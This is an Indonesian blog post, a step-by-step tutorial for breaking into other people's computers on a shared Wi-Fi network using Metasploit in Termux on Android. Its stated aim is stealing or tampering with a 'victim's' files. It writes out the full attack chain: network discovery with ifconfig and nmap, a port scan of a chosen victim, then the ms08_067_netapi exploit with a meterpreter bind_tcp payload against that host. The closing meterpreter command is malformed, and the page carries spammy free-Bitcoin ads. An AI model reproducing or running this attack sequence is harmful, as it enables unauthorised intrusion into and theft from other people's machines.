loading...
Rool Game And Get Free BitCoin up to $200/hour
Mau BTC Free? Masukkan Wallet BTC Kamu DISINI dan Claim. 100 Claim/Days

Cara Masuk Komputer Orang Lain Dengan Termux Metasploit di Android

Mau nyolong file atau ngacak" file orang lewat wifi, tapi tutor ini ane praktekin dengan target yang menggunakan Termux di Android. Pastikan Anda sudah install metasploit-framework + samba yah. Tamplilannya akan terlihat seperti ini: 

Pada gambar di bawah nih masukkan perintah cd untuk melihat list folder.
Kemudian Pada gambar di atas masukkan perintah ls untuk melihat list file folder.

Sekarang cari target komputer yang sedang aktif online terlebih dulu cari tau nomor IP DHCP yang kita dapat dengan memasukkan perintah / command berikut:
ifconfig -a atau -an atau -n
Maka hasilnya akan kurang lebih seperti dibawah ini:
eth1 Link encap:Ethernet HWaddr 00:50:BF:1B:B5:51inet addr:192.168.0.10 Bcast:192.168.0.255 Mask:255.255.255
Berarti kita dapet IP 192.168.0.10 entah punya siapa hehe.

Lanjut, kita langsung scan komputer yang lagi online di area itu dengan command berikut:
nmap -sP 192.168.0.0/24
Maka hasilnya kurang lebih seperti berikut, lihat hasilnya :
Host 192.168.0.1 appears to be up.MAC Address: 00:B0:6C:EF:47:30 (Unknown)Host arman (192.168.0.10) appears to be up.Host 192.168.0.1 appears to be up.MAC Address: 00:E0:4C:ED:41:20 (Unknown)Host mycomp (192.168.0.11) appears to be up.MAC Address: 00:E0:5C:FD:45:17 (Unknown)
dan seterusnya ...

Lalu apa selanjutnya, OK pilih salah satu target (korban) yaitu : 192.168.0.11

Lakukan ping dulu ke IP korban. Siapa tau sudah dipasang firewall anti Kamu wkwkwk! Masukkan peintah berikut:
ping 192.168.0.11
Jika hasilnya reply maka siap melakukan langkah berikutnya. Scan port yang terbuka terlebih dahulu yah, commandnya seperti ini:
nmap 192.168.0.11
Lalu lihat hasilnya yang kurang lebih seperti ini:
PORT STATE SERVICE
139/tcp open nb-session
445/tcp open microsoft-ds
8080/tcp open http-proxy
OK port 445 terbuka dan sasaran empuk untuk menyusup kesana lakukan urutan exploitasi berikut:

Jalankan metasploit dengan memasukkan command berikut: [syarat metasploit-framework sudah Anda install sebelumnya]

Maaf nih Saya selip video yah Judulnya | Cara Spammer SMS Grab ke HP Teman

Lanjut:
Masukkan perintah berikut maka akan muncul tampilan seperti ini, beda beda yah tiap kali run msfconsole nya:
msfconsole

Pilih jenis tools untuk exploit yang saya pake command di bawah ini:
use windows/smb/ms08_067_netapi
Pilih metode penyerangan lanjut dengan command dibawah ini:
set payload windows/meterpreter/bind_tcp
Tambahkan target IP korban yang udah di scan tadi ke dalam command berikut:
set RHOST 192.168.0.11
Langsung lakukan exploit dengan memasukkan command besikut:
exploit
Jika muncul prompt dibawah ini brarti serangan berhasil:
meterpreter>
Eiits tunggu dulu ente belum menguasai komputer korban sepenuhnya
Tinggal satu perintah lagi, setelah itu baru bisa diapa-apain.

meterpreter> execute -M -f -i

Jangan lupa aktifkan firewall Anda, cukup dulu yah hehe see you !
Cara Masuk Komputer Orang Lain Dengan Termux Metasploit di Android Cara Masuk Komputer Orang Lain Dengan Termux Metasploit di Android Reviewed by Rennie Ennie on January 22, 2018 Rating: 5

No comments:

loading...
Rool Game And Get Free BitCoin up to $200/hour
Powered by Blogger.